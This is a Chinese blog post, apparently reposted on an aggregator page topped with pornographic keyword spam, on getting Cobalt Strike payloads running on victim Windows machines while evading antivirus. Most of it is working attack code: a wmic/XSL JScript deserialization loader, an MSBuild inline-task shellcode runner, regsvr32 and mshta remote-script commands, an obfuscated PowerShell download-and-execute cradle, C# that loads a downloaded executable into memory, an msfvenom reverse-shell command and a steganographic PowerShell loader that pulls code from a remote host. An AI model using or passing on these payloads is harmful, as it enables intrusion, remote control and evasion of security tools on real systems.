国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CS免殺上線方式

這篇具有很好參考價值的文章主要介紹了CS免殺上線方式。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

??寫在前面

  • ??博客主頁:Scorpio_m7
  • ??歡迎關(guān)注??點贊??收藏??留言??
  • ??本文由 Scorpio_m7原創(chuàng),CSDN首發(fā)!
  • ??首發(fā)時間:??2022年1月28日??
  • ??堅持和努力一定能換來詩與遠(yuǎn)方!
  • ??作者水平很有限,如果發(fā)現(xiàn)錯誤,請留言轟炸哦!萬分感謝感謝感謝!

Wmic

wmic是一款Microsoft工具,它提供一個wmi命令行界面,用于本地和遠(yuǎn)程計算機的各種管理功能,以及wmic查詢,例如系統(tǒng)設(shè)置、停止進(jìn)程和本地或遠(yuǎn)程運行腳本。因此,它可以調(diào)用XSL腳本來執(zhí)行??梢酝ㄟ^xsl腳本來執(zhí)行命令,腳本一般用jscript編寫。先編寫一個xsl腳本,然后放到VPS上,受害機執(zhí)行下面命令會遠(yuǎn)程下載并執(zhí)行xsl的內(nèi)容。

C:\Users\Desktop>wmic os get /format:"http://172.21.66.218:8080/a.xsl"
<?xml version="1.0" encoding="UTF-16"?>0

通過安裝AMSI_bypass.cna重啟cs后attack->AMSI bypass Web Delivery(s)生成a.xsl,生成的代碼大致邏輯如下

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
var binary = "rundll32.exe";
var code = "XXX";
function setversion() {
var shell = new ActiveXObject('WScript.Shell');
ver = 'v4.0.30319';
try {
shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
} catch(e) {
ver = 'v2.0.50727';
}
shell.Environment('Process')('COMPLUS_Version') = ver;
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
function shellcode() {
var serialized_obj = "XXX";
var entry_class = 'cactusTorch';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
o.flame(binary,code);
} catch (e) {
debug(e.message);
}
return 0;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:shellcode()"/>
</xsl:template>
</xsl:stylesheet>

mshta

mshta.exe是微軟Windows操作系統(tǒng)相關(guān)程序,英文全稱Microsoft HTML Application,可翻譯為微軟超文本標(biāo)記語言應(yīng)用,用于執(zhí)行.HTA文件??梢允褂肕icrosoft MSHTA.exe工具解析JavaScript或VBScript的HTML文件。

編寫一個腳本,加載上面wmic講的的a.xsl,為了沒那么明顯,后綴名改為png,mshta同樣會把他當(dāng)成hta文件解釋運行。腳本可以通過AMSI_bypass.cna生成a.xsl時勾選use hta one liner

<HTML>
<HEAD>
</HEAD>
<BODY>
<script language="javascript" >
var xml = new ActiveXObject("Microsoft.XMLDOM");
xml.async = false;
var xsl = xml;
xsl.load("http://172.19.105.41:8080/a.xsl");
xml.transformNode(xsl);
self.close();
</script>
</body>
</html>

后面就跟wmic一樣上線。

C:\Users\Desktop>mshta http://172.19.105.41:8080/a.png

MSBUILD

MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺。MSBuild可在未安裝Visual Studio的環(huán)境中編譯.net的工程文件。MSBuild可編譯特定格式的xml文件。windows下的msbuild命令可以執(zhí)行內(nèi)容為特定格式的文件。在.NET Framework 4.0中支持了一項新功能”Inline Tasks”,被包含在元素UsingTask中,可用來在xml文件中執(zhí)行c#代碼。參考:Use MSBuild To Do More

Xml的腳本,需要把executes shellcode.xml的shellcode改成cs的c#的payload,并且修改byte長度。

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask{         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute(){
              byte[] shellcode  = new byte[XXX] { c# shellcode };//修改這里
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
              MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

使用msbuild命令必須在指定的文件夾下,版本必須得是4.0。關(guān)閉Windows Defender運行32位MSBuild命令

C:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild "C:\Users\Desktop\executes shellcode.xml"
Microsoft(R) 生成引擎版本 4.7.2046.0
[Microsoft .NET Framework 版本 4.0.30319.42000]
版權(quán)所有 (C) Microsoft Corporation。保留所有權(quán)利。

生成啟動時間為 2022/1/24 22:42:43。

regsvr32

Regsvr32命令用于注冊COM組件,是 Windows 系統(tǒng)提供的用來向系統(tǒng)注冊控件或者卸載控件的命令,以命令行方式運行。WinXP及以上系統(tǒng)的regsvr32.exe在windows\system32文件夾下;2000系統(tǒng)的regsvr32.exe在winnt\system32文件夾下。

  • /u 取消注冊
  • /s 指定 regsvr32 安靜運行,在成功注冊/反注冊DLL文件的前提下不顯示結(jié)果提示框。
  • /n 指定不調(diào)用 DllRegisterServer。此選項必須與 /i 共同使用。
  • /i:cmdline 調(diào)用 DllInstall 將它傳遞到可選的 [cmdline]。
C:\Users>regsvr32 /u /n /s /i:http://192.168.211.1/a.png scrobj.dll

后面的dll文件名不能更改。這個文件可以是任意后綴名,文件內(nèi)容格式得是xml格式的:

<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k whoami"); 
]]>
</script>
</registration>
</scriptlet>

POWSHELL

本地執(zhí)行powershell

powershell.exe -ExecutionPolicy Bypass -file rgb.ps1

遠(yuǎn)程加載腳本并進(jìn)行參數(shù)的混淆。

powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).123'.Replace('123','Downlo');$c2='adString(''httaaa.101.120:80/a'')'.Replace('aaa','p://172.19');IEX ($c1+$c2)"

powershell是一個exe程序,可以執(zhí)行自己的命令或者powershell腳本。其實powershell的本質(zhì)就是解釋器,類似于python。python解釋器通過解釋了python腳本來調(diào)用操作系統(tǒng)給予的各種底層函數(shù);powershell通過解釋powershell腳本,來調(diào)用System.Management.Automation.dll。

System.Management.Automation是.NET 框架下的一個assembly類。而c#語言可以將所謂的c#“腳本”解釋后來調(diào)用.NET框架下所有的assembly。因此我們可以用c#實現(xiàn)powershell的功能。這在當(dāng)powershell被某些策略禁用的時候十分好用。

assembly類可以加載byte[]類型的數(shù)據(jù)到內(nèi)存中并當(dāng)作一個assembly文件去執(zhí)行。assembly文件就是c#寫的dll文件與exe文件。然而還有函數(shù)可以將遠(yuǎn)程的exe文件下載到本地并用byte[]格式去保存。

這兩個方式結(jié)合后就可以實現(xiàn)下載遠(yuǎn)程c#文件到內(nèi)存中直接執(zhí)行,可以繞過絕大多數(shù)殺軟。

using System;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System;
using System.IO;
using System.Net;
using System.Linq;
using System.Reflection;

namespace demo1{
    class Program{
        static void Main(string[] args){
            string fileDownloadurl = null;
            string filedownloadtype = null;
            byte[] filebuffer = null;
            try{
                fileDownloadurl = args[1];
                filedownloadtype = args[0];
            }
            catch{
                Console.WriteLine("\n加載遠(yuǎn)程exe文件到內(nèi)存執(zhí)行:sflcsharp.exe -b exe文件的url");
                Console.WriteLine("\n加載遠(yuǎn)程base64密文文件到內(nèi)存執(zhí)行:為sflcsharp.exe -b64 b64文件的url");
                Environment.Exit(0);
            }
            if (filedownloadtype == "-b"){
                filebuffer = Downloadbinarypefilebyhttp(fileDownloadurl);
            }
            if (filedownloadtype == "-b64"){
                filebuffer = downloadbase64(fileDownloadurl);
            }
            if (filebuffer != null){
                Console.WriteLine("正在將下載下來的程序加載到當(dāng)前用戶的內(nèi)存中");
                Assembly assemblyinstance = Assembly.Load(filebuffer);  //將下載下來的程序加載到當(dāng)前用戶的內(nèi)存中
                Console.WriteLine("正在尋找程序入口點并執(zhí)行程序");
                assemblyinstance.EntryPoint.Invoke(null,new object[] { null}); //找到程序的入口點并執(zhí)行程序
                Console.WriteLine("\n程序執(zhí)行完畢");
            }
        }
        public static byte[] Downloadbinarypefilebyhttp(string url){
            Console.WriteLine("\n創(chuàng)建WebClient類用來下載PE文件");
            WebClient downloadwebclient = new WebClient();  //這個類可以從指定url上下載或者上傳數(shù)據(jù)
            Console.WriteLine("\n下載文件后自動保存為byte[]格式\n");
            byte[] test = downloadwebclient.DownloadData(url);
            return test;
        }
        public static byte[] downloadbase64(string url){
            Console.WriteLine("\n創(chuàng)建WebClient類用來下載base64密文文件,下載到的數(shù)據(jù)按照字符串格式保存在內(nèi)存");
            WebClient downloadwebclient = new WebClient();  //這個類可以從指定url上下載或者上傳數(shù)據(jù)
            string b64 = downloadwebclient.DownloadString(url);
            Console.WriteLine("將base64字符串轉(zhuǎn)換為byte[]類型的數(shù)據(jù)");
            byte[] test = Convert.FromBase64String(b64);
            return test;
        }
    }
}

通過工具下載遠(yuǎn)程文件到內(nèi)存中直接執(zhí)行

C:\Users\root\Desktop>sflcsharp.exe -b http://192.168.211.1/artifact.exe

RGB隱寫上線

使用嵌入方法,每個像素中2個顏色值的最低有效4位用于保存有效負(fù)載。

  1. 使用cs生成payload.ps1或者適用msf生成

    root@kali:~/# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.253.8 LPORT=5555 -f psh-reflection > payload.ps1
    
  2. 受害機器上設(shè)置執(zhí)行策略

    PS C:\Users\root\Desktop\Invoke-PSImage-master> Set-ExecutionPolicy Unrestricted -Scope CurrentUser
    
  3. 導(dǎo)入Invoke-PSImage.ps1文件

    PS C:\Users\root\Desktop\Invoke-PSImage-master> Import-Module .\Invoke-PSImage.ps1
    
  4. 生成 shellcode 的圖片和上線命令

    PS C:\Users\root\Desktop\Invoke-PSImage-master> Invoke-PSImage -Script .\payload.ps1 -Out .\evil.png -Image .\1.png -Web
    sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/evil.png"));$o=a Byte[] 3780;(0..14)|%{foreach($x in(0..251)){$p=$g.GetPixel($x,$_);$o[$_*252+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3538]))
    
  5. 把這個圖片上傳到服務(wù)器,并修改代碼的ip執(zhí)行就可以上線。文章來源地址http://www.zghlxwxcb.cn/news/detail-469886.html

    PS C:\Users\root\Desktop\Invoke-PSImage-master> sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.211.1/evil.png"));$o=a Byte[] 3780;(0..14)|%{foreach($x in(0..251)){$p=$g.GetPixel($x,$_);$o[$_*252+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3538]))
    

到了這里,關(guān)于CS免殺上線方式的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 利用蟻劍釣魚上線CS

    中國蟻劍使用Electron構(gòu)建客戶端軟件,Electron實現(xiàn)上用的是Node.js,并且Node.js能執(zhí)行系統(tǒng)命令,故可以利用蟻劍的webshell頁面嵌入js來直接執(zhí)行命令,進(jìn)而釣魚來上線CS。(類似Goby,Goby也是使用Electron構(gòu)建客戶端軟件) 蟻劍在虛擬終端時,頁面上出現(xiàn)http/https協(xié)議頭時會發(fā)生轉(zhuǎn)換

    2024年02月03日
    瀏覽(16)
  • 一次cs上線服務(wù)器的練習(xí)

    一次cs上線服務(wù)器的練習(xí)

    環(huán)境:利用vm搭建的環(huán)境 僅主機為65段 測試是否能與win10ping通 配置轉(zhuǎn)發(fā) 配置好iis Kali訪問測試 現(xiàn)在就用burp抓取winser的包 開啟代理 使用默認(rèn)的8080抓取成功 上線

    2024年02月06日
    瀏覽(24)
  • 關(guān)于Goby反制上線CS中的各種問題

    Goby作為新一代網(wǎng)絡(luò)安全技術(shù),通過為目標(biāo)建立完整的資產(chǎn)數(shù)據(jù)庫,實現(xiàn)快速的安全應(yīng)急,日常為廣大師傅提供了便捷的滲透體驗。最近有觀察到有關(guān)于某些蜜罐出現(xiàn)了Goby反制的指紋,頓時就起了興趣進(jìn)行研究Goby的反制,期間也遇到了很多網(wǎng)上沒有答案的坑點,這里把遇到的

    2024年02月07日
    瀏覽(18)
  • 內(nèi)網(wǎng)安全-隧道技術(shù)&SSH實現(xiàn)通信&DNS上線與通信&CS上線Linux主機

    內(nèi)網(wǎng)安全-隧道技術(shù)&SSH實現(xiàn)通信&DNS上線與通信&CS上線Linux主機

    內(nèi)網(wǎng)安全-隧道技術(shù)SSH實現(xiàn)通信DNS上線與通信CS上線Linux主機 一、DNS隧道技術(shù) DNS簡介:DNS協(xié)議為應(yīng)用層協(xié)議,區(qū)域傳輸時用tcp協(xié)議,域名解析時用udp協(xié)議 ###通過DNS隧道繞過防火墻,實現(xiàn)CS上線 實驗背景:靶機防火墻封禁出站TCP協(xié)議 1、判斷出網(wǎng)協(xié)議,若果可以ping通,可以利用

    2024年02月02日
    瀏覽(28)
  • 工具推薦之不出網(wǎng)環(huán)境下上線CS

    工具推薦之不出網(wǎng)環(huán)境下上線CS

    前言 在實戰(zhàn)攻防演練中,我們經(jīng)常會遇到目標(biāo)不出網(wǎng)的情況,即便獲取了目標(biāo)權(quán)限也不方便在目標(biāo)網(wǎng)絡(luò)進(jìn)行下一步橫向移動。本期我們將會推薦兩個常用的代理工具,使我們能在不出網(wǎng)的環(huán)境下讓目標(biāo)上線到CS,方便后滲透的工作。 工具1:DReverseServer 工具鏈接: https://gith

    2024年02月14日
    瀏覽(20)
  • 內(nèi)網(wǎng)滲透-cobaltstrike之cs上線獲取shell

    內(nèi)網(wǎng)滲透-cobaltstrike之cs上線獲取shell

    CobaltStrike是一款滲透測試神器,被業(yè)界人稱為CS神器。CobaltStrike分為客戶端與服務(wù)端,服務(wù)端是一個,客戶端可以有多個,可被團(tuán)隊進(jìn)行分布式協(xié)團(tuán)操作。 CobaltStrike集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描,自動化溢出,多模式端口監(jiān)聽,windows exe 木馬生成,windows dll 木馬生成,java 木馬

    2024年02月10日
    瀏覽(23)
  • 【內(nèi)網(wǎng)安全-CS】Cobalt Strike啟動運行&上線方法&插件

    【內(nèi)網(wǎng)安全-CS】Cobalt Strike啟動運行&上線方法&插件

    ? 博主:網(wǎng)絡(luò)安全領(lǐng)域狂熱愛好者(承諾在CSDN永久無償分享文章)。 殊榮:CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者,2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名,某廠特邀數(shù)字業(yè)務(wù)安全研究員,edusrc高白帽,vulfocus、攻防世界等平臺排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書等。 擅長:對

    2023年04月08日
    瀏覽(24)
  • CS_Smb_Beacon上線不出網(wǎng)機器

    CS_Smb_Beacon上線不出網(wǎng)機器

    當(dāng)我們想上線不出網(wǎng)的機器的時候,我們可以通過上傳工具來實現(xiàn), 但是有沒有不用上傳工具的方法呢 ??? 有?。?! 而且cs會自帶?。?! ? ?以下就是今天的實驗拓?fù)?Beacon 是 Cobalt Strike 中的 一個組件 ,它是一個 輕量級的惡意軟件代理 , 用于與攻擊者的控制服務(wù)器通信

    2024年02月22日
    瀏覽(22)
  • 內(nèi)網(wǎng)安全-代理Socks協(xié)議&CS-MSF控制上線

    內(nèi)網(wǎng)安全-代理Socks協(xié)議&CS-MSF控制上線

    目錄 實驗前提 實驗環(huán)境 實驗?zāi)繕?biāo) 環(huán)境部署 實驗1 msf通信win10的56網(wǎng)段與正向連接? msf通信win10 msf上線win10 實驗2?cs通信win10的56網(wǎng)段與正向連接 cs通信win10 cs上線win10 ? 實驗環(huán)境 本地計算機存在一個36網(wǎng)段可以與win7ping通并且可以上網(wǎng)。 win7存在36和52網(wǎng)段,可以與本地和win10p

    2024年02月16日
    瀏覽(26)
  • 遮天 | 實戰(zhàn)繞過卡巴斯基、Defender上線CS和MSF及動態(tài)命令執(zhí)行...

    遮天 | 實戰(zhàn)繞過卡巴斯基、Defender上線CS和MSF及動態(tài)命令執(zhí)行...

    #? zTian.red: 繞過卡巴 斯基、360安全衛(wèi)士、Windows Defender動態(tài)執(zhí)行CS、MSF命令... 測試目標(biāo):Windows Defender、卡巴斯基、360安全衛(wèi)士極速版 系統(tǒng)環(huán)境:win10 64位??? 軟件版本:cs4.7破解版、msf社區(qū)免費版? 流量通信:http與https 測試平臺:遮天對抗平臺,地址:zTian.red 測試時間:

    2023年04月08日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包